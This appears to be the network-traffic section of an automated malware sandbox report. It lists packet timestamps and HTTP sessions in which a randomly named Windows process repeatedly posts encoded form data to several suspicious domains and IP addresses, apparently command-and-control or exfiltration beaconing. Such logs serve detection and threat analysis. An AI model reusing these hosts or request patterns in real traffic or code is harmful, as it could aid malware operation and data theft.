                                                                                                                                                                            Sep 27, 2024 17:31:42.586884975 CEST806371985.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:42.586963892 CEST6371980192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:42.600414038 CEST6371980192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:42.605355024 CEST806371985.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:44.108829021 CEST6371980192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:44.114274979 CEST806371985.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:44.117722034 CEST6371980192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:45.128859043 CEST6372080192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:45.133861065 CEST806372085.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:45.133944035 CEST6372080192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:45.148454905 CEST6372080192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:45.153599024 CEST806372085.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:46.655731916 CEST6372080192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:46.662277937 CEST806372085.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:46.662349939 CEST6372080192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:47.677690983 CEST6372180192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:47.682758093 CEST806372185.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:47.682923079 CEST6372180192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:47.694169044 CEST6372180192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:47.699112892 CEST806372185.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:47.699258089 CEST806372185.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:49.202624083 CEST6372180192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:49.207973003 CEST806372185.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:49.209759951 CEST6372180192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:50.221584082 CEST6372280192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:50.226562977 CEST806372285.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:50.226650953 CEST6372280192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:50.235347033 CEST6372280192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:50.240236998 CEST806372285.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:50.929873943 CEST806372285.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:50.929941893 CEST806372285.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:50.930042982 CEST6372280192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:50.933132887 CEST6372280192.168.2.585.159.66.93
                                                                                                                                                                            Sep 27, 2024 17:31:50.939987898 CEST806372285.159.66.93192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:56.448406935 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:56.453284025 CEST8063723160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:56.453377962 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:56.465771914 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:56.470613956 CEST8063723160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:57.286891937 CEST8063723160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:57.286937952 CEST8063723160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:57.288710117 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:57.968234062 CEST6372380192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:58.994440079 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:58.999603033 CEST8063725160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:58.999681950 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:59.012377024 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:31:59.017333031 CEST8063725160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:59.822199106 CEST8063725160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:59.822334051 CEST8063725160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:59.824589968 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:00.515078068 CEST6372580192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:01.533714056 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:01.538645029 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:01.541780949 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:01.550728083 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:01.555717945 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:01.555747032 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:02.544923067 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:02.545123100 CEST8063726160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:02.545176029 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:03.061963081 CEST6372680192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.081712008 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.086812973 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:04.089055061 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.095128059 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.100042105 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:04.944849014 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:04.944989920 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:04.945053101 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.947622061 CEST6372780192.168.2.5160.251.148.20
                                                                                                                                                                            Sep 27, 2024 17:32:04.952488899 CEST8063727160.251.148.20192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:10.410633087 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:10.427402973 CEST8063728208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:10.427599907 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:10.442198038 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:10.452291965 CEST8063728208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:10.965820074 CEST8063728208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:10.965892076 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:11.952657938 CEST6372880192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:11.958447933 CEST8063728208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:12.971610069 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:13.011288881 CEST8063729208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:13.011415958 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:13.025866985 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:13.031024933 CEST8063729208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:13.559016943 CEST8063729208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:13.559112072 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:14.530811071 CEST6372980192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:14.541083097 CEST8063729208.91.197.39192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:32:15.551976919 CEST6373080192.168.2.5208.91.197.39
                                                                                                                                                                            Sep 27, 2024 17:32:15.557243109 CEST8063730208.91.197.39192.168.2.5
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 63688 | 65.21.196.90 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:29:45.589664936 CEST | 585 | OUT | GET /1nuz/?Ah=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4Oq8ZNp7wpFj1U/P2B+qNM5mXkMr/9uw3rZ9uOJdcOYzpfEQ==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.030003302.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:29:46.279315948 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Connection: close
                                                                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            content-length: 796
                                                                                                                                                                            date: Fri, 27 Sep 2024 15:29:46 GMT
                                                                                                                                                                            vary: User-Agent
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 63692 | 3.33.130.190 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:30:17.533838987 CEST | 847 | OUT | POST /974s/ HTTP/1.1
                                                                                                                                                                            Host: www.searchgpt.homes
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.searchgpt.homes
                                                                                                                                                                            Referer: http://www.searchgpt.homes/974s/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=9qpKTRFtJSx+0cilvcGTwCHBZyfNtFBkl82fDxfEwnouu3ESUDDPsOo23yQz12W9rA/mEuvIbemz4RdMBTTxQwm7Kn0FiZ3NGXNpl5jwj4bbz8/DExqZsxM5OKLEtSApni33Emqs6M8fef1UJT9iJVenvy+TEoX+kTyp2sBFAXJ2NF19uuFeQcL+9mPx2/uqIusQ1lw=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 63693 | 3.33.130.190 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:30:20.085330009 CEST | 867 | OUT | POST /974s/ HTTP/1.1
                                                                                                                                                                            Host: www.searchgpt.homes
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.searchgpt.homes
                                                                                                                                                                            Referer: http://www.searchgpt.homes/974s/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=9qpKTRFtJSx+04mlq/uThyHGAyfNjlBgl86fDzyZw0MuuS4SVHfPvOo28SQ26WWmrAjEEvTIbeCz4U5MAgr2Rgm5HH0Hs53NGXNpl52dj4DbwMvDGQqWhRM+eaLEpSAtni2SEkOK6PIfeb9UIAllele9yi/6Idm68xOh7NYBc2hAIzYX0MN2D8nGt1HGnPPDSN8grylnFm0iIaN84+hQZ7VtSml+


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 63694 | 3.33.130.190 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:30:22.628164053 CEST | 1884 | OUT | POST /974s/ HTTP/1.1
                                                                                                                                                                            Host: www.searchgpt.homes
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.searchgpt.homes
                                                                                                                                                                            Referer: http://www.searchgpt.homes/974s/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 63695 | 3.33.130.190 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:30:25.602435112 CEST | 587 | OUT | GET /974s/?Ah=woBqQkVhEnZr0PORhZ6z2TjABxOeyQlLpumkFgr+omNv0XEbVjbEhcV/qAVpymWGpDThRtO2eu+z9gp0JATUVQjZP0Y2t77DZFNVy7Otm7ne66vNCWn1tABYRqLOiyRBkA==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.searchgpt.homes
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:30:26.054779053 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: openresty
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:26 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 269
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ah=woBqQkVhEnZr0PORhZ6z2TjABxOeyQlLpumkFgr+omNv0XEbVjbEhcV/qAVpymWGpDThRtO2eu+z9gp0JATUVQjZP0Y2t77DZFNVy7Otm7ne66vNCWn1tABYRqLOiyRBkA==&6RGD=r8eHwnMpb2dxK"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 63696 | 38.47.233.19 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:30:31.596084118 CEST | 829 | OUT | POST /mkti/ HTTP/1.1
                                                                                                                                                                            Host: www.2q63f.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.2q63f.top
                                                                                                                                                                            Referer: http://www.2q63f.top/mkti/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=ul7BBTnHsuDOHL2uR9Gq5wiVSNSMfZd7+tXL1Cbob+O5iv95y7/wgMvEzE+q8OWyvSTFLvpbj3o/L20Vx3AP/tIKa4b7NN/DulVoMYLfVHNdixnOF8MZBqantT3xO1WlNH8b7aNnVkE1xOmnocNC8yaVAXA1q0F3cczQsgcHVPmQNQLWXMutcoyqKY/K2lwDgbSKIhg=
                                                                                                                                                                            Sep 27, 2024 17:30:32.493469954 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:32 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            6 | 192.168.2.5 | 63699 | 38.47.233.19 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:30:34.146953106 CEST | 849 | OUT | POST /mkti/ HTTP/1.1
                                                                                                                                                                            Host: www.2q63f.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.2q63f.top
                                                                                                                                                                            Referer: http://www.2q63f.top/mkti/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=ul7BBTnHsuDOGqGuXaqq7QiWMdSMR5d/+tLL1A2zbLW5iON5x6/wtsvE4k+Vh+W5vSf7Lrtbj0U/L3EVxEYM5tIIG4b5Dt/DulVoMYv1VHFdiAXOUtMafabV7D3xElW5NH857bRBVhI1xM+noNNd3yafEXBHkkQwdNX4wWJyV9mIMmm8NumFPIeSaL39nVRq64C6W21nJEHPtKG0KLBwoEFzZLeU
                                                                                                                                                                            Sep 27, 2024 17:30:35.076477051 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:34 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            7 | 192.168.2.5 | 63700 | 38.47.233.19 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:30:36.690921068 CEST | 1866 | OUT | POST /mkti/ HTTP/1.1
                                                                                                                                                                            Host: www.2q63f.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.2q63f.top
                                                                                                                                                                            Referer: http://www.2q63f.top/mkti/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:30:37.596261024 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:37 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            8 | 192.168.2.5 | 63701 | 38.47.233.19 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:30:39.235620975 CEST | 581 | OUT | GET /mkti/?6RGD=r8eHwnMpb2dxK&Ah=jnThCjOJiNX3HI/1X6ra8iqRT8LvO5Bl0cjrkRPRR4aUtJ5UnZH8goi0lUnBvvC66wXnOPoFvnQ+LE8o+1Q4j9xZYpeOMfjH2lF0fJzOXlNgjT3mfY10J4nKlD3uClfrXg== HTTP/1.1
                                                                                                                                                                            Host: www.2q63f.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:30:40.119501114 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:39 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            9 | 192.168.2.5 | 63702 | 172.67.165.25 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:30:45.432077885 CEST | 841 | OUT | POST /f66t/ HTTP/1.1
                                                                                                                                                                            Host: www.b5x7vk.agency
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.b5x7vk.agency
                                                                                                                                                                            Referer: http://www.b5x7vk.agency/f66t/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=9OlRkVjAdej6yzTXiNX6XaJLs1n9GGYF44yPbge5ni5E1voMlwTPphJhE3g6u2Z696gmJn/NYfbWQvMu9NPsxhjlhZ+W+JFCyZmqAwk9NaKAPOGVnpARHmNN1JnCsZK3McZs7O09aIvX+nyyxRc0NZz2VrvXEE58a6FTeqGec8RODLtpx1BbgJly4a1G6YdW76akkvE=
                                                                                                                                                                            Sep 27, 2024 17:30:46.411181927 CEST | 688 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:46 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6aXeM3MhiMSMnaUiXyy%2FWaGoGavnfbXxkPxmI9wQw7H3zgj9mXmFFwQVlcdcc%2B728iYBeObpIDAnQoB2wb6YqEK6odhz%2FM4Oxdc5%2FR6kXPC5Pyvw8Vmqmw9jpc2RoBB5lemxPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
